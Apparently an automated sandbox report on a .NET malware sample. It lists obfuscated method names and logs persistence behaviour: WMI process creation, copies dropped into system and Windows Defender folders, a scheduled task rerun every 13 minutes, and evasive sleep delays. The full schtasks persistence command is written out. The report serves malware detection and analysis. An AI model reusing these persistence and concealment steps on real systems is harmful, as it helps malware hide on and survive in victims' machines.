Source: QT4aLb3P98.exe, t1oTv2uR1gYWPhCUSmQ.cs High entropy of concatenated method names: '_5u9', 'cuRefN7b6l', 'fg43JZgfiW', 'JkteBVtdRa', 'vUOjjtB2RPQxAP3N1e4', 'B3ABBLBIpcsLxHRfeZf', 'sWXkCeBi5VbZIsoxUKn', 'Tw7YKCBvUQPuuVWPI0J', 'iXyhPEBXA4FUTsuweEi', 'ObyH7QBzOwMh9yBB7SC'
Source: QT4aLb3P98.exe, jkav5lNNECc0Odq3fH0.cs High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'G1CwIdh4vTldJCPE5ol', 'cgug8ghxohHAZaAj5RI', 'aVEISDhgsVYFSdLQEk9', 'U26Jslht8RpcqlGo3ps', 'NPK40ThBupgbfHBuG1e', 'GLkKA2hN0pNAoLV70me'
Source: QT4aLb3P98.exe, X1UIGM8c5QLbQq0LLre.cs High entropy of concatenated method names: 'jeRrED7UPk', 'fKGr2x4yTE', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'BWIrDbQjn0', '_5f9', 'A6Y'
Source: QT4aLb3P98.exe, hXsQGFtX56S1EipSi4v.cs High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'CUB4JuDgrY', '_3il', 'Pen4NlHHOM', 'z5b4ZvWmqp', '_78N', 'z3K'
Source: QT4aLb3P98.exe, wBZWePNrhAL5nVBw9jE.cs High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'LKn8hoRQojvd6PAnBom', 'e8jc8yRYa9SUbTD4ORS', 'IZaGuDRuN7tjwQUXmWm', 'YPmhsBRUpLrCGE9F6Fc', 'P9EfjDRewTETDfIb5cT', 'JGTllURP3h6GfH0xXYP'
Source: QT4aLb3P98.exe, S40dvEuQ7jK72id4wZ7.cs High entropy of concatenated method names: 'sg9', 'OOuejXs39n', 'goL0kVShta', 'aHxeumoiWS', 'VPQteFBYJVHyXb1taPf', 'khaX5aBu513NFleKRb2', 'RdPYu9BUMyOuIBMdCYa', 'hYpEI8B36TyryscZAst', 'DmiSb5BQYPyQLSgSNgG', 'zG9ZX0Be6x9nv1eUhWN'
Source: QT4aLb3P98.exe, uHHycvNdSFMNNBlbCYv.cs High entropy of concatenated method names: 'lw6NkviEub', 'NNK1uscDDS5QL9ZiEOt', 'x1diYScLxwdNw63i1m4', 'S5mDoLcVc0MxaUb5KMR', 'O6VLd8c6xvFLPinQwqF', 'bgsi3QcAfadIAhN3f5M', '_3Xh', 'YZ8', '_123', 'G9C'
Source: QT4aLb3P98.exe, Oe87gUNhWxMO6kf13UX.cs High entropy of concatenated method names: 'SBEZNmOeLR', 'fpZZZQJO31', 'ClNZuLa87D', 'WDxpK3ceR3biXe1kbeV', 'KWHSwrcPWOC8DEeWO8p', 'qAmLxKcu4CAqIoNQ97w', 'IFxkUAcUZkWFNKAN74f', 'RqnGXOc9uTMHNxfduMM', 'W1RSjDcvohEnAMfOKqJ', 'FHEJT3cXNCYMVjv5ys5'
Source: QT4aLb3P98.exe, rhru3CtmKRBIwyOUeKa.cs High entropy of concatenated method names: 'p0Pxgxnejo', 'YsLxaceU1P', 'f51xdUIGM5', 'MLbxBQq0LL', 'xeTxvtPVC0', 'AiiqkyniW2mBYkylxEj', 'GMJISanzqEQY0cArFrF', 'aHVLxjn2jZjEhGHePZ6', 'lEuSTEnItZDmwceUNeB', 'Qy60800oSZamns9yxCS'
Source: QT4aLb3P98.exe, zXkMSauCe24hAWQcI3t.cs High entropy of concatenated method names: '_269', '_5E7', 'eaceyl6tPc', 'Mz8', 'MO0eMRxru7', 'JLAjYtNeeO2IOyqARuM', 'qSAVhANPcRZHL5b4eTg', 'SvIoMmN9fqrBVeLHvqY', 'rZhCuANvmjGqxVSxgYV', 'DiYjTWNXImQLrcMgDRK'
Source: QT4aLb3P98.exe, usI4qlZj7gr1SQ2Fg3B.cs High entropy of concatenated method names: 'XvtufkZ8mj', 'qpPDyybFyJ6CEL2C27T', 'BitJMybOpamnD8pD4y4', 'ThRp0qbm7BbN0m7u9E4', 'UPu4isbaR3Xleamu308', 'qGVgQob1nrteu2pKaeM', 'vycoqFbhe9ZwPISaRe6', 'gr5PPObqZRVf0sV0qDC', 'TJE8sTbRhg4FUyMHJjr', 'aySIrMb5ZyECQOunscC'
Source: QT4aLb3P98.exe, Il9jirNpW9Osd1ujfDE.cs High entropy of concatenated method names: 'Dc6NDRB0Vj', 'mRPDG9RrlAEtrkCKkZT', 'u9qQMcRy1cGmgiN12VW', 'YrVcGMRScDhPmA5Rdu8', 'R47ippRZw2sJQ1KweXk', 'IMkE1FR4aNM0EdoevO2', 'vXMXpgRxkGvc6ruPh93', 'pyeeyKRgsptXPrQy15Q', 'ch1IrVRtkR348Zd5omE', 'f28'
Source: QT4aLb3P98.exe, Ma3XfBujYuyjOXAUl2p.cs High entropy of concatenated method names: 'cnpUiGXnmB', 'wlkUR0EtN6', 'v2RUTk8MUQ', 'TLhUSiHjKC', 'dT5x5wgGOkt1eUo9Xct', 'Y3pjQsgV6RhHmxZiNHF', 'kHxqnKg6J971uUUELLx', 'SBllUVgwBXDHAoNCpNc', 'vsNbPmgKyT11TglGRbT', 'iHni5agDbEkvqoF2bsM'
Source: QT4aLb3P98.exe, vxthXMumwQ2XbaEW6BC.cs High entropy of concatenated method names: '_223', 'P0tkg0grFVb7OfS72Xr', 'QUg0E3gyeBcJdWRoGQg', 'M4oicjg4t0GisVqKA3T', 'tB16uPgxE5m8I7U37Lc', 'cWyCJ1ggi5NCJUTj5RH', 'Lm1TmygtnsEjh2OX4IY', 'jibCfCgBIGlwLh5B7GK', 'OTHnREgNTyhNkG7wcpF', 'UblttLgE7ZpxvsF8GyX'
Source: QT4aLb3P98.exe, Y5E7NeZZnVaGDulYyPU.cs High entropy of concatenated method names: 'XynZnixJ7c', 'SudZIl9jir', 'q9OZwsd1uj', 'VDEZb6m7fU', 'TRjZ9yvAY1', 'jZrZCuk4nB', 'dHTs0x7rwgIkS0wsae9', 'VlHdKx7yNUhnJTvgqi4', 'yERwDZ7SVFTEnOS3Pdk', 'a5brWK7ZgopT9Fnysxx'
Source: QT4aLb3P98.exe, B1WhZLZcFCKgVBuE9xm.cs High entropy of concatenated method names: 'gEoKr1GKex', 'L8HJuOyUJOnDEf6VLvf', 'JY5cdmyYsC2cLWsshrF', 'VFMfyZyuceyOJoP63ii', 'bJ680byeQx8g0c2uMqm', 'PPAvgkyPFQUeKqJFlHJ', 'bkTKGU8TUo', 'gLWKpqhT0r', 'MdeKMIVWiN', 'banKeHtXxS'
Source: QT4aLb3P98.exe, imgqEk1NkFVIJTjxyO.cs High entropy of concatenated method names: 'HqVXK7nOB', 'RqPrbkrhd', 'CKDASULqW', 'GdpHgYlQ8', 'EKTE3L4le', 'euT2cw1ck', 'mPWDpS0sa', 'AZLPO6mRFX0ix3wxIwd', 'L2cCjym5isvoe28DOCa', 'MA4Tu1mcmoSUGlvBv1x'
Source: QT4aLb3P98.exe, bQmmCqtfKYIrsALXgKh.cs High entropy of concatenated method names: 'ytBlrudUPa', 'xOSlH1UPlh', 'Iuul4nl6BE', 'h2Slj6mcyn', 'b1illye2tM', 'HgFlPERi5S', 'jLGl6EUVUW', 'DrslWkdb8i', 'Oo4lGEyt0B', 'miOlpBYPeg'
Source: QT4aLb3P98.exe, QpqlPrt6qViXeys5rY6.cs High entropy of concatenated method names: 'fdCmtl0wyl', 'NZjm8bqRwh', 'hjDmYMTp45', 'yytD3t0ZiDRk4XmvFvG', 'uRXbBi0re5Jpvfl30yA', 'LHQUep0kicElrLFvSjO', 'pHGFoU0SPAFa8etd9xW', 'gZg3Fd0yGagScL33Zle', 'V4Z0ye04n2e82sDKNiX', 'MU8pHJ0x76YNIgAwR3B'
Source: QT4aLb3P98.exe, iy1cveKrlv64Wh8Vqjt.cs High entropy of concatenated method names: 'seDyXnIblI', 'bNXyrvXTlE', 'bPpyAAWZ8L', 'MlGyHk70eY', 'JCAyEFPJKO', 'bshy2p5ksk', 'TtHyDE2j3P', 'NNdys90FkB', 'dUsyytIjuK', 'GwdyqI30Ps'
Source: QT4aLb3P98.exe, ni3nO9Z0bNMZMdyGDZt.cs High entropy of concatenated method names: 'q5fuqIoWsp', 'M7yuOolhY1', 'uTeuL87gUW', 'kMOug6kf13', 'gXouaeoff0', 'T27udsCbB2', 'lneuBVqeZF', 'ADXMVsCEKQu8IcuejCw', 'SseZJ0CBR54mSHqJiMh', 'FIuSGCCNiI2HkMg8Vg2'
Source: QT4aLb3P98.exe, ryOWDeYH52AtW3pEx4I.cs High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: QT4aLb3P98.exe, NZKUnsZJnV0LItcaVlq.cs High entropy of concatenated method names: 'WrJZr7ALox', 'zQyZAaIMFO', 'flIZHc1DiB', 'yIJWiRjK0GmWIqdgtA6', 'vOeSqbjGDU1JC2uuYrp', 'PVtfkTjVEgvV4ircwJ3', 'EpFODRj6ESHF4y1nfN6', 'vaVTYrjD3XSo4aKRTnt', 'FSncAvjL58ERNOnmqBy', 'DSqL9PjdFj4ka85WjFl'
Source: QT4aLb3P98.exe, t58adVZ6Tp3dLCx87je.cs High entropy of concatenated method names: 'q8qukj816Y', 'fdNuckcKrK', 'WdhpHQb4OYKa9MRWR7a', 'Jk69Ddbx3vrtMkQXq3N', 'U00XEWbgO0jrAnVJnck', 'KcgHTLbtLjSUmEYfU7v', 'jwh3oBbBJ0eIOaYHtcT', 'EB8cTwbNaa54AlN8s5E', 'GZu5C9bEsRM8ceBkJfU', 'kD0CwabnmbGOwJAsGPd'
Source: QT4aLb3P98.exe, owVVNau3ID4pWFRCvRQ.cs High entropy of concatenated method names: 'iJ2UO1m9mu', 'uHHULC1MjL', 'ax3Uglu6CW', 'tcJwjMgbuaV5CuPiC0G', 'BGak6Ig7DMiNQVT2x9a', 'BaDHyVgCg1fqUfXtQ6h', 'A7UE7pgkSCk5yZDBphU', 'mhAUlWQcI3', 'dwsUPuLW0E', 'f3bU62VT5U'
Source: QT4aLb3P98.exe, M2g42hRTlT3Juk1Iid.cs High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'hpTwHfOraXVhkElNSg8', 'ciroEpOyTrx7I8Vd5rR', 'ig6d3yO4GhyDAGSOmvW', 'FpVQnNOxu4sjB2G8m7J', 'JuwBgZOgsbPtBuMC5kC', 'B0TYeiOtKqsSYYP8IpD'
Source: QT4aLb3P98.exe, uddODc8s6acvvGCZNCT.cs High entropy of concatenated method names: 'CPqXnMSKat', 'Ye6XIBKY44', 'yN1XwP3oc3', 'MlwxQNDHhJkKbdJyfTa', 'C1qa04DLNFPY144RvtF', 'iUQBQ4DANmHvrfFdCjH', 'bsIdMQDp41GFwwk9517', 'TnSNTcDW714sQ33vM84', 'LaB4fIDTnyk7pYVbX0D', 'gMME43DlgFu2WgAkr5K'
Source: QT4aLb3P98.exe, TLhiHjt0KCFo9M4TEsM.cs High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: QT4aLb3P98.exe, SN0KRnYY7559Wgi9CMG.cs High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: QT4aLb3P98.exe, vVrGC1NPPSVZM9hSUyJ.cs High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'yaksblqPJfw4t4CT2WT', 'oKeFE4q9FCoUGwGGc0m', 'ShkfO6qvnr5r5lbDZWs', 'HY2R4oqXv83DMhYcuPo', 'Ay4we5q29SKaIUTX06F', 'BgLmWFqIsNFFckiHtXE'
Source: QT4aLb3P98.exe, rBD5FkZMePyC2BmrsYt.cs High entropy of concatenated method names: 'CDpt4RZKUn', 'CnVtj0LItc', 'K2g3u3kEIg0Ei5ASvlJ', 'gqlYPYknUEp4C6t6o9Y', 'IQkkyskBr9wNukdg3mJ', 'y621ZOkND5XLLXbepb3', 'pbptIQk0q3EFC4LOOT4', 'BjC3BKkfC4FhKRo2f37', 'neAiIYkMPV006nhcL5n', 'RmbMbfks0BD8lkVqWsH'
Source: QT4aLb3P98.exe, eCvo6IYRNd4oZMvnetA.cs High entropy of concatenated method names: 'PJ1', 'jo3', 'SStD0AQ17U', 'beuD3tnHlS', 'GScDon52PB', 'EC9', '_74a', '_8pl', '_27D', '_524'
Source: QT4aLb3P98.exe, WBG0UTNSjUwClLs4mcC.cs High entropy of concatenated method names: 'qxYZobrKDh', 'WWDZxqkus6', 'aXk4uOJjl3ExGy6wufN', 'WctLuKJckP4Cha2eJe8', 'KpVmpnJJuCOk83ABxfO', 'bPsXodJ79knp56lpL36', 'hGicFvJCe8TPwX3s8Bh', 'oGJ904JbNjtiGD2R89W', 'oR8FrXJkE65Du7UUFIE', 'wwRvBGJSZ5jJqUdKrVo'
Source: QT4aLb3P98.exe, LCuKj8ZvlvbbJsqDURf.cs High entropy of concatenated method names: 'Tf0YUjiXrs', 'u9oY0Ug4bY', 'ORZaEnrvxV3Qwj4HZZk', 'T1XPXMrXuEhW2RrO5bK', 'LPIm7brPi8TaGKEElJF', 'D0Biocr90eGaAfAmrTL', 'vWhY6ZLFCK', 'swNMZAyoA3s5PUbaKOj', 'ToWIZrymLDDckrmcaXp', 'ABT74qrihnHeXHIcKZG'
Source: QT4aLb3P98.exe, LWnyVJYJI3UvpfiEQ9Z.cs High entropy of concatenated method names: 'SDCrTeAyt4', 'e6MrSpY20A', 'o8Arn6Y0CT', 'tMbrI03Js5', 'icDrwwjyuG', 'WvprbpMUgb', '_838', 'vVb', 'g24', '_9oL'
Source: QT4aLb3P98.exe, Tgw1Z0ZLXYf3HIC0jf1.cs High entropy of concatenated method names: 'd9g8Dw1Z0X', 'hKC393ZI8N6VJvOvTWt', 'Qp19CVZiTQve9q0bbdS', 'WGADdbZXOlTkvPZeOOs', 'SK9m7oZ2i03iKKAf3v5', 'aEirAAZzvv4ZJFaexG0', 'PkREfkrosejnMe3aahu', 'cnQmoIrmLWiUU5ZHCh4', 'xBbhRjraGuo4HWXV1Es', 'rrnkWFrFC8H4wWX40Uq'
Source: QT4aLb3P98.exe, Nks8MkuSKFrHfaZN2Jq.cs High entropy of concatenated method names: 'oYo', '_1Z5', 'IoXebDNUIs', 'mi53tP6VF3', 'LvLewHDe5N', 'lAZ7hqNC5DUfm1UbqfY', 'z26iLZNbnLZTd0g4IqR', 'SaZbWDNk5nFnDT9EEK5', 'CegVLONSxlcePybhkQ9', 'hvVmejNZqQtVVgTEaDR'
Source: QT4aLb3P98.exe, uiWc9RtGKVtbXTJIfcc.cs High entropy of concatenated method names: '_7zt', 'WL2mpMLSbt', 'XWUmMlpPmj', 'VMGme1H5Qi', 'IfBmVTrtfq', 'NIZm19t9AR', 'fIUmFY1eHD', 'i8meP90BCZwKvgjZfpL', 'SbkHWB0NG7AZP5EPfCj', 'YeGkfD0gLDB6iHpI2KQ'
Source: QT4aLb3P98.exe, VB7ms2ObiBoGsjKUPY.cs High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'jD4iHOANp', 'cI4BfXaV8SAKrdfKp7w', 'rVIn2ia6mD0thXSQJh0', 'yRbAlOaDTYinXIYq5xI', 'sZ6mMDaL4EDm8klmXaQ', 'ArCM8saAhdYrsgNV0eI'
Source: QT4aLb3P98.exe, rWoxi0NH2A6w82H23NQ.cs High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'uWEvQ2RifyePvbtdKwF', 'Ffn3sbRzTpts0Kp3JOb', 'kPPvtP5oLBP0i0ks32n', 'msc59B5m8h0873y9blb', 'nJAT4b5aiwcJxBtd0kM', 'RqX81b5FsDsyqREY64G'
Source: QT4aLb3P98.exe, HLVXDouNnYU2sDwld1D.cs High entropy of concatenated method names: 'H9rKD8fP3s', 'qZUKsNUCDN', 'OXYKypY7gO', 'YI3KqCoEqO', 'UaF5Eoyz1UMXP2DBvrI', 'tCSJwqyIWGkk8SwHqWM', 'hLpWdTyikZYMdZ1ol3d', 'puTch04oL3fG3DlsDm3', 'aguiGy4mAo1g2KJCIt1', 'V8RnG54ab4CGEXnSqMn'
Source: QT4aLb3P98.exe, Kjm3wWtkkP7cKfE0Myw.cs High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: QT4aLb3P98.exe, xpiIOKNmMjZM7bUdfgm.cs High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'HND1v6qfdPGJaaG1yro', 'QGYjDvqMnejaip6PjQD', 'lBhc4vqscrc13YFAfyk', 'feSsN1q8mLl5HVG6HK6', 'iaGfViqd7idg3xMxoW3', 'pH3cgqqwc8iyW0x9wsj'
Source: QT4aLb3P98.exe, cTSn42tCv2nD65trZkU.cs High entropy of concatenated method names: 'CddjkCI2Bf', 'u4sjL9utdV', 'tSmjgpngve', 'BxIjaqBINO', 'Deqjd1OdUY', 'ac8jBPODvF', 'VJljvIVj5B', 'JGmjhU9l3t', 'YMZjQ7w4Bs', 'jg2jiAlUlC'
Source: QT4aLb3P98.exe, f0ZvaUfvgmw6viEubD.cs High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'tQlERI1lqF0nshJV9pM', 't7UbgB13gCa2DliJlnQ', 'ePMWq61QLfGVYZQIa1H', 'hvS9fd1YRCIH3lqnRja', 'U6vOq01uXVwqOPHVAna', 'tCvpxK1Ug0320TGMMuC'
Source: QT4aLb3P98.exe, vAvRw3K4pP2OrHcG5JZ.cs High entropy of concatenated method names: 'VOso1n30ofeUx125CoM', 'eKPAST3f4PbasB3DyFC', 'MydKWw3E7nZJhwuXVhd', 'F8tHrx3nL5hpFRQPinN', 'h7iyjBQ8C0', 'vm7ujZ380fPqpSrW2yo', 'l8QxET3dALdTuwuIw1A', 'JLvCnN3wFpUoG5HrIRu', 'z7wE6D3Klmmq36wMFNi', 'cZQr2d3G23NDMSWZwZl'
Source: QT4aLb3P98.exe, BTLjiFZ1TPXQi1ln8br.cs High entropy of concatenated method names: 'xpDtewtPFD', 'GtItVPqoj6', 'Nv1t1jsBrB', 'vL0tFAbidY', 'ViftXC0shI', 'IxlHxjSoxDu6ywfyCvd', 'ps5jMISm5igdRX18lt9', 'hHUq55kiOq3wbfMLZ61', 'kD1cm3kzh5qa8XA6jrD', 'HuuR9NSaLJWhxDtftgP'
Source: QT4aLb3P98.exe, VdeGXIIcFBlHTuEbpR.cs High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'YTxKEh1hklpbQFU7jZN', 'VaQEex1q7acNT2MUpln', 'aGL4uL1RgYqv3CnFYGC', 'QgIGH81512hfiJvyTDQ', 'QBNYRO1cTG1f7DB3Vyw', 'j7l5LL1JQfh0nZMYdq2'
Source: QT4aLb3P98.exe, jKZ0VDNuv9wwwXiK5NM.cs High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'XdfRvBh897kAg3GxHtr', 'YVGKpQhdJb2SyiyN68K', 'EagAbrhwmBNAw3oYcQ5', 'cWf8lShKYRaPNI04wVL', 'w5rmhThG0fmSJLlEP9N', 'L8uka8hVEg0ZCCyih1Q'
Source: QT4aLb3P98.exe, X0Nd8igyK80AYELy4R.cs High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'j90UIAaIYl6CWSamMOs', 'zsfvj7aiMfikMG5ihEo', 'LgOjuEaztuM3PjcuWxC', 'l1d6KlFoHvqsHZHLxTW', 'jO2hi6FmCHdXBq14w0q', 'fL6lSOFanu1Ru14QvmE'
Source: QT4aLb3P98.exe, Bp4ZB3NWjZla5GrHXP7.cs High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'WOd5WfRoJxqdSlxXETE', 'zW4pO5RmuY2PkFfRied', 'WcuWc9RajpfxklqZDGG', 'v6mfHYRFRgMCk1eWkMj', 'NWLJd7ROj6jFhpVXnx3', 'ybpBIPR1NbAd7UymasB'
Source: QT4aLb3P98.exe, DBFF6cNcMUnhCquT18O.cs High entropy of concatenated method names: 'TnDZ1M33wb', 'wE8ZFPxa9w', 'y4CZXIVcpT', 'CWwhcJjJoKdkPDUVb8g', 'wKkPdej5mklbCClkTBX', 'grer40jcNcIPNBZxnFD', 'NBPIx6jjuZdrWCSOanX', 'nNyPLIj7E36K9QCeyVs', 'zVPy97jCa3Zr268LEY7', 'qfQ2TMjbWNPDNFfX7uN'
Source: QT4aLb3P98.exe, amB5IBNVT21egwIQ4uC.cs High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'smIct9REaSMrsgduqch', 'EBVi6SRnqA2DECLYutN', 'BwAv8YR0411neRw4RSt', 'xguWtMRflw4eohOHPDv', 'feDIAYRMhaChlPsUuw8', 'EGG0rDRsjsH6VKKVPQg'
Source: QT4aLb3P98.exe, GjJqNONfLJn1EnSVkIw.cs High entropy of concatenated method names: 'AXEZp0osTL', 'j3uq5ajhHwclq0uVjSl', 'S6CXRWjqWpymJ8cRCeU', 'DTbvAajOOMPvgFhfWh4', 'J1jRJHj1fwFw0lotXro', 'qRlbgcjRnssUeZhvZb4', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: QT4aLb3P98.exe, z4Q5Xb8HQoib0P58lWy.cs High entropy of concatenated method names: 'giwXBpB57h', 'EglXvf3GJ4', 'qxPXhU3pM8', 'nhhXQ7P4cy', 'xVFXiCFN6p', 'ty9P36DMJcapQwcrpH1', 'tvQ3ujD0SP8FY6pM94q', 'gCe0h0Dfxut3lJppkLH', 'VST3hUDs70XwFW8Bt75', 'JwLyhDD8hxwmXkxY70O'
Source: QT4aLb3P98.exe, LkOdUWuIRPdAfy4FVCp.cs High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'juYeJXI4pv', '_168', 'tM3oEVNnJH7whO1W3KK', 'QlnW7AN0n82K1Z2FeOC', 'BGMVT7NfX4LZFgBFtO1', 'tycAraNM38JcAY5Qwa6', 'xiVNg0NslDblaqPyqfp'
Source: QT4aLb3P98.exe, vC283A89eGfXw91Enbe.cs High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: QT4aLb3P98.exe, kC8ruJY2wXCeCi0Zmua.cs High entropy of concatenated method names: 'zWyH0bjoyJ', 'm7GH3EwwEj', 'RYtHoFS2Mx', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'BXlHxrcgpi'
Source: QT4aLb3P98.exe, uqhbAr8LI1LKAoANRxZ.cs High entropy of concatenated method names: 'lAYrJy2Ewl', 'jY3oxfD2nrdm0QwxifS', 'QsUdgSDv3pQc1UTUuQx', 'KExcWVDXlmZVQ1fsa9D', 'BXcp1cDIwb9WoenMeEb', 'YZE9a0Di7LatiPPXt9c', 'Q0wNcvDzTdP3CAF4hvb'
Source: QT4aLb3P98.exe, SfTBeSNjc7p3pKOouCM.cs High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'IIo6r3qAtG2HrL05GF8', 'OWPhaaqHyQ14lavkLTC', 'SrWmDhqpc2MjQrgbHuA', 'YZHvJjqWnxywXIWS5Sp', 'UPWgrFqTLlHH66vqhpU', 'DEYhhJqlGQ2pxgjEIG2'
Source: QT4aLb3P98.exe, lwOADkzMmEhwsmc6g4.cs High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'unwTcDhF5g3L7cYY3Xh', 'LeGHHFhOZw3SYQRbLI2', 'cBSmmqh1Gkxx6quCWUL', 'tMPDP6hhNUL4IE8paOk', 'RaY1YDhqUuNg6jloxwJ', 'HkdURPhRVihAdVvYu7V'

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows\Media\Sonata\wRRcPdViqk.exe
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Windows\Media\Sonata\wRRcPdViqk.exe
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File created: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe

Boot Survival

Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Memory allocated: 16E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Memory allocated: 1B270000 memory reserve | memory write watch
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Memory allocated: 1360000 memory reserve | memory write watch
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Memory allocated: 1AEE0000 memory reserve | memory write watch
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Memory allocated: 820000 memory reserve | memory write watch
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Memory allocated: 1A4D0000 memory reserve | memory write watch
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Memory allocated: 12D0000 memory reserve | memory write watch
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Memory allocated: 1AFB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 600000
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 599891
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 599782
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Window / User API: threadDelayed 1304
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Window / User API: threadDelayed 945
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Window / User API: threadDelayed 369
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Window / User API: threadDelayed 359
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Window / User API: threadDelayed 1014
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Window / User API: threadDelayed 899
Source: C:\Users\user\Desktop\QT4aLb3P98.exe TID: 6576 Thread sleep count: 1304 > 30
Source: C:\Users\user\Desktop\QT4aLb3P98.exe TID: 6464 Thread sleep count: 945 > 30
Source: C:\Users\user\Desktop\QT4aLb3P98.exe TID: 5076 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7180 Thread sleep count: 369 > 30
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 5600 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7196 Thread sleep count: 359 > 30
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7196 Thread sleep count: 1014 > 30
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7244 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7244 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7244 Thread sleep time: -599891s >= -30000s
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7244 Thread sleep time: -599782s >= -30000s
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 3804 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7296 Thread sleep count: 899 > 30
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7300 Thread sleep count: 131 > 30
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7272 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 600000
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 599891
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 599782
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\AppData\Local
